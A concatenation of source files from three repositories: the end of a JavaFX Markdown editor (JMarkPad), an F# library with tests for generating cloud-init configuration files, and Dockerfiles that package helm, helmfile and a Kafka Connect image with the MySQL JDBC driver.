"I kept adding functionalities until it became a useful tool.\n\n" +
"Source code\n" +
"Find the full source code and additional in the following github repository\n" +
"https://github.com/mayuso/JMarkPad\n\n" +
"Found a bug?\n" +
"Please feel free to open a new issue in our github issue tracker\n" +
"https://github.com/mayuso/JMarkPad/issues\n\n" +
"Thank you for using JMarkPad :)";
dialogLayout.setBody(new Text(body));
JFXButton btnDialog = new JFXButton("OK");
btnDialog.setCursor(Cursor.HAND);
btnDialog.getStyleClass().add("custom-jfx-button-raised");
dialogLayout.setActions(btnDialog);
JFXDialog dialog = new JFXDialog(stackPane, dialogLayout, JFXDialog.DialogTransition.TOP, false);
btnDialog.setOnAction(e -> dialog.close());
dialog.show();
}
private boolean fileIsAlreadyOpened(String filePath) {
boolean result = false;
for (int i = 0; i < tabPane.getTabs().size(); i++) {
JMPTab currentlyOpenTab = (JMPTab) tabPane.getTabs().get(i);
if (currentlyOpenTab.getFilePath().equals(filePath)) {
tabPane.getSelectionModel().select(i);
result = true;
}
}
return result;
}
private void openFileIntoTab(File file, JMPTab tab) throws IOException {
// try-with-resources closes the reader even if reading fails part-way through
try (BufferedReader bufferedReader = new BufferedReader(new FileReader(file))) {
String text;
JFXTextArea textArea = new JFXTextArea("");
while ((text = bufferedReader.readLine()) != null) {
textArea.appendText(text + "\n");
}
tab.setTextArea(textArea);
}
}
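// Writes jmarkpad.properties: default values when isNewFile is true, otherwise the current window position, size, colors, and open file paths.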
private void createPropertiesFile(String filePaths, boolean isNewFile) {
Properties properties = new Properties();
if (isNewFile) {
properties.setProperty("posX", "0");
properties.setProperty("posY", "0");
properties.setProperty("width", "800");
properties.setProperty("height", "600");
properties.setProperty("primaryColor", "#26c6da");
properties.setProperty("secondaryColor", "#2ce8ffff");
properties.setProperty("folderPath", System.getProperty("user.dir"));
properties.setProperty("filePaths", "");
} else {
try {
properties.setProperty("posX", String.valueOf(stage.getX()));
properties.setProperty("posY", String.valueOf(stage.getY()));
properties.setProperty("width", String.valueOf(stage.getWidth()));
properties.setProperty("height", String.valueOf(stage.getHeight()));
properties.setProperty("primaryColor", String.valueOf(primaryColor));
properties.setProperty("secondaryColor", String.valueOf(secondaryColor));
properties.setProperty("folderPath", String.valueOf(folderPath));
properties.setProperty("filePaths", String.valueOf(filePaths));
} catch (Exception e) {
e.printStackTrace();
}
}
try {
properties.store(new FileOutputStream("jmarkpad.properties"), null);
} catch (IOException e) {
e.printStackTrace();
}
}
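// Called on application exit: prompts to save any unsaved tabs, then persists window state and open file paths.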
@Override
public void stop() {
String filePaths = "";
for (Tab tab : tabPane.getTabs()) {
JMPTab mTab = (JMPTab) tab;
filePaths = filePaths.concat(mTab.getFilePath() + ";");
if (!mTab.isSaved) {
mTab.checkIfUserWantsToSaveFile();
}
}
createPropertiesFile(filePaths, false);
System.exit(0);
}
public void refreshTheme() {
decorator.setStyle("-fx-decorator-color: " + primaryColor);
menuBar.setStyle("-fx-background-color: " + primaryColor);
tabPane.setStyle("tab-header-background: " + secondaryColor);
}
}
<|start_filename|>src/main/java/ui/JMPDecorator.java<|end_filename|>
package ui;
import com.jfoenix.controls.JFXDecorator;
import javafx.scene.Node;
import javafx.stage.Stage;
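// Thin JFXDecorator subclass that exposes the visibility of the built-in fullscreen button.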
public class JMPDecorator extends JFXDecorator {
public JMPDecorator(Stage stage, Node node) {
super(stage, node);
}
public boolean isBtnFullscreenVisible() {
return super.btnFull.isVisible();
}
public void setBtnFullscreenVisible(boolean isVisible) {
super.btnFull.setVisible(isVisible);
}
}
| mayuso/JMarkPad |
<|start_filename|>FsCloudInit/CloudConfig.fs<|end_filename|>
namespace FsCloudInit
open System
open System.Collections.Generic
module FileEncoding =
[<Literal>]
let Base64 = "b64"
[<Literal>]
let GzipBase64 = "gz+base64"
[<Flags>]
type PosixFilePerm =
| None = 0
| Execute = 1
| Write = 2
| Read = 4
type FilePermissions = {
User : PosixFilePerm
Group : PosixFilePerm
Others : PosixFilePerm
}
with
static member None = PosixFilePerm.None
static member R = PosixFilePerm.Read
static member RW = PosixFilePerm.Read ||| PosixFilePerm.Write
static member RX = PosixFilePerm.Read ||| PosixFilePerm.Execute
static member RWX = PosixFilePerm.Read ||| PosixFilePerm.Write ||| PosixFilePerm.Execute
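/// Octal-style permission string, e.g. "0644" for user read/write, group read, others read.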
member this.Value =
$"0{int this.User}{int this.Group}{int this.Others}"
static member Parse (s:string) =
match UInt32.TryParse s with
// Reject any digit above 7, not just values above 777 (e.g. "693" is not a valid mask).
| true, num when num > 777u || (num / 10u) % 10u > 7u || num % 10u > 7u ->
invalidArg "string" "Invalid values for permission flags."
| true, num ->
{
User = enum<PosixFilePerm> (int ((num / 100u) % 10u))
Group = enum<PosixFilePerm> (int ((num / 10u) % 10u))
Others = enum<PosixFilePerm> (int (num % 10u))
}
| false, _ -> invalidArg "string" "Malformed permission flags."
type WriteFile =
{
Encoding : string
Content : string
Owner : string
Path : string
Permissions : string
Append : bool
}
static member Default =
{
Encoding = null
Content = null
Owner = null
Path = null
Permissions = null
Append = false
}
type AptSource =
{
Keyid : string
Key : string
Keyserver : string
Source : string
}
static member Default =
{
Keyid = null
Key = null
Keyserver = null
Source = null
}
type Apt() =
member val Sources = Unchecked.defaultof<IDictionary<string, AptSource>> with get, set
type Package =
| Package of string
| PackageVersion of PackageName:string * PackageVersion:string
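/// Shape expected by cloud-init: either a bare package name or a [name, version] pair.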
member this.Model =
match this with
| Package p -> box p
| PackageVersion (name, ver) -> [ name; ver] |> ResizeArray |> box
type Cmd = string list
type RunCmd =
| RunCmd of Cmd list
member this.Model : string seq seq =
match this with
| RunCmd (commands) ->
commands |> Seq.map Seq.ofList
type CloudConfig =
{
Apt : Apt option
FinalMessage : string option
Packages : Package seq
PackageUpdate : bool option
PackageUpgrade : bool option
PackageRebootIfRequired : bool option
RunCmd : RunCmd option
WriteFiles : WriteFile seq
}
static member Default =
{
Apt = None
FinalMessage = None
Packages = []
PackageUpdate = None
PackageUpgrade = None
PackageRebootIfRequired = None
RunCmd = None
WriteFiles = []
}
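// Anonymous record handed to the YAML serializer: options become nulls/Nullables so unset fields are omitted from the output.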
member this.ConfigModel =
{|
Apt = this.Apt |> Option.defaultValue Unchecked.defaultof<Apt>
FinalMessage = this.FinalMessage |> Option.toObj
Packages =
if this.Packages |> Seq.isEmpty then null
else this.Packages |> Seq.map (fun p -> p.Model)
PackageUpdate = this.PackageUpdate |> Option.toNullable
PackageUpgrade = this.PackageUpgrade |> Option.toNullable
PackageRebootIfRequired = this.PackageRebootIfRequired |> Option.toNullable
// "Runcmd" (not "RunCmd") so the underscored naming convention emits "runcmd", the key cloud-init expects.
Runcmd = this.RunCmd |> Option.map(fun runCmd -> runCmd.Model) |> Option.toObj
WriteFiles =
if this.WriteFiles |> Seq.isEmpty then null
else this.WriteFiles
|}
<|start_filename|>FsCloudInitTests/ConfigGeneration.fs<|end_filename|>
module ConfigGeneration
open System
open System.Collections.Generic
open System.IO
open System.IO.Compression
open Expecto
open TestShared
open FsCloudInit
[<Tests>]
let tests =
testList "cloud-config generation" [
test "Generates empty cloud config" {
CloudConfig.Default
|> Writer.write
|> matchExpectedAt "empty-config.yaml"
}
test "Generates basic cloud config" {
{
CloudConfig.Default with
PackageUpgrade = Some true
}
|> Writer.write
|> matchExpectedAt "package-upgrade.yaml"
}
test "Generates with packages to install" {
{
CloudConfig.Default with
Packages = [ Package "httpd" ]
PackageUpgrade = Some true
}
|> Writer.write
|> matchExpectedAt "package-install.yaml"
}
testAsync "Embed Microsoft apt source and key" {
// curl -sSL https://packages.microsoft.com/config/ubuntu/20.04/prod.list | sudo tee /etc/apt/sources.list.d/microsoft-prod.list
let! aptSourceRes = http.GetAsync "https://packages.microsoft.com/config/ubuntu/20.04/prod.list" |> Async.AwaitTask
let! aptSource = aptSourceRes.Content.ReadAsStringAsync () |> Async.AwaitTask
// curl -sSL https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -
let! gpgKeyRes = http.GetAsync "https://packages.microsoft.com/keys/microsoft.asc" |> Async.AwaitTask
let! gpgKey = gpgKeyRes.Content.ReadAsStringAsync () |> Async.AwaitTask
{
CloudConfig.Default with
Apt =
Apt (
Sources =
dict [
"microsoft-prod", { AptSource.Default with Key = gpgKey; Source = aptSource}
]
) |> Some
PackageUpdate = Some true
Packages = [Package "apt-transport-https"; Package "dotnet-sdk-6.0"]
}
|> Writer.write
|> matchExpectedAt "apt-source.yaml"
}
testAsync "Install specific dotnet SDK version" {
let! aptSourceRes = http.GetAsync "https://packages.microsoft.com/config/ubuntu/20.04/prod.list" |> Async.AwaitTask
let! aptSource = aptSourceRes.Content.ReadAsStringAsync () |> Async.AwaitTask
let! gpgKeyRes = http.GetAsync "https://packages.microsoft.com/keys/microsoft.asc" |> Async.AwaitTask
let! gpgKey = gpgKeyRes.Content.ReadAsStringAsync () |> Async.AwaitTask
{
CloudConfig.Default with
Apt =
Apt (
Sources =
dict [
"microsoft-prod", { AptSource.Default with Key = gpgKey; Source = aptSource}
]
) |> Some
PackageUpdate = Some true
Packages = [
Package "apt-transport-https"
PackageVersion (PackageName="dotnet-sdk-6.0", PackageVersion="6.0.100-1")
]
}
|> Writer.write
|> matchExpectedAt "package-specific.yaml"
}
test "Embed file" {
let content = "hello world"
{
CloudConfig.Default with
WriteFiles = [
{
WriteFile.Default with
Encoding = FileEncoding.Base64
Content = content |> System.Text.Encoding.UTF8.GetBytes |> Convert.ToBase64String
Path = "/var/lib/data/hello"
}
]
}
|> Writer.write
|> matchExpectedAt "file-embedding.yaml"
}
test "Embed Gzipped file" {
let contentStream = new MemoryStream("hello world" |> System.Text.Encoding.UTF8.GetBytes)
use compressedContent = new MemoryStream()
using (new GZipStream(compressedContent, CompressionMode.Compress))
(fun gz -> contentStream.CopyTo(gz))
let b64 = compressedContent.ToArray() |> Convert.ToBase64String
let yaml =
{
CloudConfig.Default with
WriteFiles = [
{
WriteFile.Default with
Encoding = FileEncoding.GzipBase64
Content = b64
Path = "/var/lib/data/hello"
}
]
}
|> Writer.write
let data:Dictionary<string, ResizeArray<Dictionary<string,string>>> =
YamlDotNet.Serialization.Deserializer().Deserialize(yaml)
let content = data.["write_files"].[0].["content"]
let gzContent = content |> System.Convert.FromBase64String
use uncompressed = new MemoryStream()
using (new GZipStream(new MemoryStream(gzContent), CompressionMode.Decompress))
( fun gz -> gz.CopyTo uncompressed )
let helloWorld = uncompressed.ToArray() |> System.Text.Encoding.UTF8.GetString
Expect.equal helloWorld "hello world" "Unzipped data didn't match"
}
test "File permission string generation" {
let perms1 = {
User = FilePermissions.RWX
Group = FilePermissions.RW
Others = FilePermissions.R
}
Expect.equal perms1.Value "0764" "Unexpected permission mask perms1"
let perms2 = {
User = FilePermissions.None
Group = FilePermissions.None
Others = FilePermissions.None
}
Expect.equal perms2.Value "0000" "Unexpected permission mask perms2"
let perms3 = {
User = FilePermissions.RW
Group = FilePermissions.R
Others = FilePermissions.R
}
Expect.equal perms3.Value "0644" "Unexpected permission mask perms3"
let perms4 = {
User = FilePermissions.R
Group = FilePermissions.None
Others = FilePermissions.None
}
Expect.equal perms4.Value "0400" "Unexpected permission mask perms4"
}
test "File permission string parsing" {
let perms764 = FilePermissions.Parse "764"
let expected = {
User = FilePermissions.RWX
Group = FilePermissions.RW
Others = FilePermissions.R
}
Expect.equal perms764 expected "Parsing permissions returned incorrect value."
}
test "Embed readonly file" {
let content = "hello world"
{
CloudConfig.Default with
WriteFiles = [
{
WriteFile.Default with
Encoding = FileEncoding.Base64
Content = content |> System.Text.Encoding.UTF8.GetBytes |> Convert.ToBase64String
Path = "/var/lib/data/hello"
Owner = "azureuser:azureuser"
Permissions = {
User = FilePermissions.R
Group = FilePermissions.None
Others = FilePermissions.None }.Value
}
]
}
|> Writer.write
|> matchExpectedAt "file-embedding-readonly.yaml"
}
test "Run a command" {
{
CloudConfig.Default with
RunCmd =
[
[ "ls"; "-l"; "/" ]
[ "sh"; "-c"; "date >> whatsthetime.txt && cat whatsthetime.txt" ]
"apt update".Split null |> List.ofArray
] |> RunCmd |> Some
}
|> Writer.write
|> matchExpectedAt "run-command.yaml"
}
test "Print a final message" {
{
CloudConfig.Default with
FinalMessage = Some "#### Cloud-init is done! ####"
}
|> Writer.write
|> matchExpectedAt "final-message.yaml"
}
]
<|start_filename|>FsCloudInitTests/BuilderTests.fs<|end_filename|>
module BuilderTests
open System.Collections.Generic
open System.IO
open System.IO.Compression
open Expecto
open TestShared
open FsCloudInit
open FsCloudInit.Builders
[<Tests>]
let tests =
testList "cloud-config generation" [
test "Install packages by name" {
cloudConfig {
package_upgrade true
add_packages [
"httpd"
]
}
|> Writer.write
|> matchExpectedAt "package-install.yaml"
}
test "Embed file builder" {
cloudConfig {
write_files [
writeFile {
path "/var/lib/data/hello"
content "hello world"
}
]
}
|> Writer.write
|> matchExpectedAt "file-embedding.yaml"
}
test "Embed gzipped file builder" {
let yaml =
cloudConfig {
write_files [
writeFile {
path "/var/lib/data/hello"
gzip_data "hello world"
}
]
}
|> Writer.write
let data:Dictionary<string, ResizeArray<Dictionary<string,string>>> =
YamlDotNet.Serialization.Deserializer().Deserialize(yaml)
let content = data.["write_files"].[0].["content"]
let gzContent = content |> System.Convert.FromBase64String
use uncompressed = new MemoryStream()
using (new GZipStream(new MemoryStream(gzContent), CompressionMode.Decompress))
( fun gz -> gz.CopyTo uncompressed )
let helloWorld = uncompressed.ToArray() |> System.Text.Encoding.UTF8.GetString
Expect.equal helloWorld "hello world" "Unzipped data didn't match"
}
test "Embed readonly file builder" {
cloudConfig {
write_files [
writeFile {
path "/var/lib/data/hello"
content "hello world"
owner "azureuser:azureuser"
permissions "400"
}
]
}
|> Writer.write
|> matchExpectedAt "file-embedding-readonly.yaml"
}
testAsync "Install dotnet with aptSource builders" {
let! aptSourceRes = http.GetAsync "https://packages.microsoft.com/config/ubuntu/20.04/prod.list" |> Async.AwaitTask
let! aptSourceVal = aptSourceRes.Content.ReadAsStringAsync () |> Async.AwaitTask
let! gpgKeyRes = http.GetAsync "https://packages.microsoft.com/keys/microsoft.asc" |> Async.AwaitTask
let! gpgKey = gpgKeyRes.Content.ReadAsStringAsync () |> Async.AwaitTask
cloudConfig {
add_apt_sources [
aptSource {
name "microsoft-prod"
key gpgKey
source aptSourceVal
}
]
package_update true
add_packages [
Package "apt-transport-https"
PackageVersion (PackageName="dotnet-sdk-6.0", PackageVersion="6.0.100-1")
]
}
|> Writer.write
|> matchExpectedAt "package-specific.yaml"
}
test "Final message with cloudConfig builder" {
cloudConfig {
final_message "#### Cloud-init is done! ####"
}
|> Writer.write
|> matchExpectedAt "final-message.yaml"
}
test "Run commands with cloudConfig builder" {
cloudConfig {
run_commands [
[ "ls"; "-l"; "/" ]
[ "sh"; "-c"; "date >> whatsthetime.txt && cat whatsthetime.txt" ]
"apt update".Split null
]
}
|> Writer.write
|> matchExpectedAt "run-command.yaml"
}
]
<|start_filename|>FsCloudInitTests/TestShared.fs<|end_filename|>
module TestShared
open System
open System.IO
open Expecto
let http = new System.Net.Http.HttpClient()
let matchExpectedAt (expectedContentFile:string) (generatedConfig:string) =
let expected = File.ReadAllText $"TestContent/{expectedContentFile}"
Expect.equal (generatedConfig.Trim()) (expected.Trim()) $"Did not match expected config at TestContent/{expectedContentFile}"
<|start_filename|>FsCloudInit/Writer.fs<|end_filename|>
namespace FsCloudInit
open System
open YamlDotNet.Serialization
module Writer =
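/// Serializes the config model to YAML (snake_case keys, defaults omitted) and prepends the "#cloud-config" header.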
let write (config:CloudConfig) =
let serializer =
SerializerBuilder()
.WithNamingConvention(YamlDotNet.Serialization.NamingConventions.UnderscoredNamingConvention.Instance)
.ConfigureDefaultValuesHandling(DefaultValuesHandling.OmitDefaults)
.Build()
String.Concat ("#cloud-config", Environment.NewLine, serializer.Serialize config.ConfigModel)
<|start_filename|>FsCloudInit/Builders.fs<|end_filename|>
namespace FsCloudInit
open System
open System.IO.Compression
module Builders =
/// Builder for a WriteFile record.
type WriteFileBuilder () =
member _.Yield _ = WriteFile.Default
[<CustomOperation "path">]
member _.Path (writeFile:WriteFile, path:string) =
{ writeFile with Path = path }
[<CustomOperation "content">]
member _.Content (writeFile:WriteFile, content:string) =
{ writeFile with
Encoding = FileEncoding.Base64
Content = content |> System.Text.Encoding.UTF8.GetBytes |> Convert.ToBase64String }
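/// Gzip-compresses the content and stores it base64-encoded with the "gz+base64" encoding.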
[<CustomOperation "gzip_data">]
member _.GZipData (writeFile:WriteFile, contentStream:System.IO.Stream) =
use compressed = new System.IO.MemoryStream()
using (new GZipStream(compressed, CompressionMode.Compress)) contentStream.CopyTo
let content = compressed.ToArray() |> Convert.ToBase64String
{ writeFile with
Encoding = FileEncoding.GzipBase64
Content = content }
member this.GZipData (writeFile:WriteFile, content:byte []) =
use ms = new System.IO.MemoryStream(content)
this.GZipData (writeFile, ms)
member this.GZipData (writeFile:WriteFile, content:string) =
use ms = new System.IO.MemoryStream(content |> System.Text.Encoding.UTF8.GetBytes)
this.GZipData (writeFile, ms)
[<CustomOperation "base64_encoded_content">]
member _.Base64EncodedContent (writeFile:WriteFile, content:string) =
{ writeFile with
Encoding = FileEncoding.Base64
Content = content }
[<CustomOperation "owner">]
member _.Owner (writeFile:WriteFile, owner:string) =
{ writeFile with Owner = owner }
[<CustomOperation "permissions">]
member _.Permissions (writeFile:WriteFile, permissions:string) =
{ writeFile with Permissions = FilePermissions.Parse(permissions).Value }
member _.Permissions (writeFile:WriteFile, permissions:FilePermissions) =
{ writeFile with Permissions = permissions.Value }
[<CustomOperation "append">]
member _.Append (writeFile:WriteFile, append:bool) =
{ writeFile with Append = append }
let writeFile = WriteFileBuilder ()
type AptSourceConfig =
{
Name : string
Source : AptSource
}
static member Default = { Name = ""; Source = AptSource.Default }
type AptSourceBuilder () =
member _.Yield _ = AptSourceConfig.Default
[<CustomOperation "name">]
member _.Name (aptSource:AptSourceConfig, name:string) =
{ aptSource with Name = name }
[<CustomOperation "keyid">]
member _.KeyId (aptSource:AptSourceConfig, keyid:string) =
{ aptSource with Source = { aptSource.Source with Keyid = keyid } }
[<CustomOperation "key">]
member _.Key (aptSource:AptSourceConfig, key:string) =
{ aptSource with Source = { aptSource.Source with Key = key } }
[<CustomOperation "keyserver">]
member _.KeyServer (aptSource:AptSourceConfig, keyserver:string) =
{ aptSource with Source = { aptSource.Source with Keyserver = keyserver } }
[<CustomOperation "source">]
member _.Source (aptSource:AptSourceConfig, source:string) =
{ aptSource with Source = { aptSource.Source with Source = source } }
let aptSource = AptSourceBuilder ()
/// Builder for a CloudConfig record.
type CloudConfigBuilder () =
member _.Yield _ = CloudConfig.Default
[<CustomOperation "write_files">]
member _.WriteFiles (cloudConfig:CloudConfig, writeFiles: WriteFile seq) =
{ cloudConfig with WriteFiles = writeFiles }
[<CustomOperation "add_apt_sources">]
member _.Apt (cloudConfig:CloudConfig, aptSources: AptSourceConfig seq) =
match cloudConfig.Apt with
| Some apt ->
for source in aptSources do
apt.Sources.[source.Name] <- source.Source
cloudConfig
| None ->
let sources = aptSources |> Seq.map (fun s -> s.Name, s.Source) |> dict
{ cloudConfig with Apt = Some (Apt (Sources = sources)) }
[<CustomOperation "package_update">]
member _.PackageUpdate (cloudConfig:CloudConfig, packageUpdate:bool) =
{ cloudConfig with PackageUpdate = Some packageUpdate }
[<CustomOperation "package_upgrade">]
member _.PackageUpgrade (cloudConfig:CloudConfig, packageUpgrade:bool) =
{ cloudConfig with PackageUpgrade = Some packageUpgrade }
[<CustomOperation "add_packages">]
member _.AddPackages (cloudConfig:CloudConfig, packages:Package seq) =
{ cloudConfig with Packages = Seq.append cloudConfig.Packages packages }
member _.AddPackages (cloudConfig:CloudConfig, packages:string seq) =
let packages = packages |> Seq.map Package
{ cloudConfig with Packages = Seq.append cloudConfig.Packages packages }
[<CustomOperation "final_message">]
member _.FinalMessage (cloudConfig:CloudConfig, message:string) =
{ cloudConfig with FinalMessage = Some message }
[<CustomOperation "run_commands">]
member _.RunCommands (cloudConfig:CloudConfig, commands:string seq seq) =
let cmdList = commands |> Seq.map List.ofSeq |> List.ofSeq
{ cloudConfig with
RunCmd =
match cloudConfig.RunCmd with
| Some (RunCmd runCmd) -> List.append runCmd cmdList
| None -> cmdList
|> RunCmd |> Some
}
let cloudConfig = CloudConfigBuilder ()
| ninjarobot/FsCloudInit |
<|start_filename|>helm/Dockerfile<|end_filename|>
FROM chatwork/alpine-sdk:3.12
ARG HELM_VERSION=3.7.2
LABEL version="${HELM_VERSION}"
LABEL maintainer="<EMAIL>"
LABEL maintainer="<EMAIL>"
ENV HELM_FILE_NAME helm-v${HELM_VERSION}-linux-amd64.tar.gz
WORKDIR /
RUN apk --update --no-cache add ca-certificates bash
ADD https://get.helm.sh/${HELM_FILE_NAME} /tmp
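# Unpack the release tarball, keep only the helm binary, and clean up the download.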
RUN tar -zxvf /tmp/${HELM_FILE_NAME} -C /tmp \
&& mv /tmp/linux-amd64/helm /usr/bin/helm \
&& rm -rf /tmp/*
ENTRYPOINT ["/usr/bin/helm"]
<|start_filename|>kafka-connect-mysql/Dockerfile<|end_filename|>
ARG KAFKA_CONNECT_VERSION=5.5.6
# https://github.com/confluentinc/cp-docker-images/blob/5.3.1-post/debian/kafka-connect-base/Dockerfile
FROM confluentinc/cp-kafka-connect-base:${KAFKA_CONNECT_VERSION}
ARG KAFKA_CONNECT_VERSION=5.5.6
ARG MYSQL_CONNECTOR_VERSION=8.0.27
LABEL version="${KAFKA_CONNECT_VERSION}-${MYSQL_CONNECTOR_VERSION}"
LABEL maintainer="<EMAIL>"
LABEL maintainer="<EMAIL>"
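# Trust the Confluent apt key for the matching minor version, install the Kafka Connect JDBC plugin, and download the MySQL JDBC driver jar next to it.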
RUN wget -qO - http://packages.confluent.io/deb/$(echo $KAFKA_CONNECT_VERSION | sed 's/\.[0-9]*$//')/archive.key | apt-key add - \
&& apt-get update && apt-get install -y --no-install-recommends \
confluent-kafka-connect-jdbc=${KAFKA_CONNECT_VERSION}-1 \
&& wget -O /usr/share/java/kafka/mysql-connector-java-${MYSQL_CONNECTOR_VERSION}.jar https://repo1.maven.org/maven2/mysql/mysql-connector-java/${MYSQL_CONNECTOR_VERSION}/mysql-connector-java-${MYSQL_CONNECTOR_VERSION}.jar \
&& mv /usr/share/java/kafka-connect-jdbc/* /usr/share/java/kafka/ \
&& apt-get clean \
&& rm -rf /var/lib/apt/lists/*
EXPOSE 8083
<|start_filename|>helmfile/Dockerfile<|end_filename|>
ARG HELMFILE_VERSION=0.142.0
FROM quay.io/roboll/helmfile:v${HELMFILE_VERSION}
ARG HELMFILE_VERSION=0.142.0
ARG HELM_X_VERSION=0.8.1
LABEL version="${HELMFILE_VERSION}"
LABEL maintainer="<EMAIL>"
LABEL maintainer="<EMAIL>"
WORKDIR /
RUN helm plugin install https://github.com/mumoshu/helm-x --version v${HELM_X_VERSION}
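# Add Python 3, the AWS CLI, and jq on top of the helmfile base image.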
RUN apk --no-cache add python3 py3-pip groff jq \
&& pip3 install --no-cache-dir --upgrade pip \
&& pip3 install --no-cache-dir awscli
ENTRYPOINT ["/usr/local/bin/helmfile"]
| chatwork/dockerfiles |